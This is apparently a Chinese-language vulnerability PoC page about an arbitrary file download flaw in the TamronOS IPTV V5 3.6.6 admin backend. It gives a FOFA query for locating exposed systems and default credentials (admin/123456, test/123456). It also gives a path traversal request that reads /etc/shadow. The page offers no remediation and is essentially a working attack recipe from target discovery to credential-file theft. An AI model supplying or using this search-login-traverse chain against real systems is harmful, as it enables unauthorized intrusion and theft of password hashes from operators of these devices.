TamronOS_IPTV系统后台任意文件下载-棉花糖会员站

# TamronOS IPTV系统后台任意文件下载

## 漏洞描述

TamronOS IPTV系统存在任意文件下载

## 漏洞影响

> TamronOS IPTV V5 3.6.6

## FOFA

> title=”TamronOS IPTV系统”

## POC

1）登录界面

![1](/static/qingy/TamronOS_IPTV系统后台任意文件下载/img/1.png)

2）该系统默认弱口令admin/123456,登录后的界面如下也可以试试test/123456

![2](/static/qingy/TamronOS_IPTV系统后台任意文件下载/img/2.png)

4）存在下载的地方，下载抓包

![3](/static/qingy/TamronOS_IPTV系统后台任意文件下载/img/3.png)

![4](/static/qingy/TamronOS_IPTV系统后台任意文件下载/img/4.png)

修改参数，读取文件成功POC如下

“`
GET /download/backup?name=./../../../../../etc/shadow
“`

![5](/static/qingy/TamronOS_IPTV系统后台任意文件下载/img/5.png)

![6](/static/qingy/TamronOS_IPTV系统后台任意文件下载/img/6.png)

文章版权归作者所有，未经允许请勿转载。

THE END

TamronOS_IPTV系统后台任意文件下载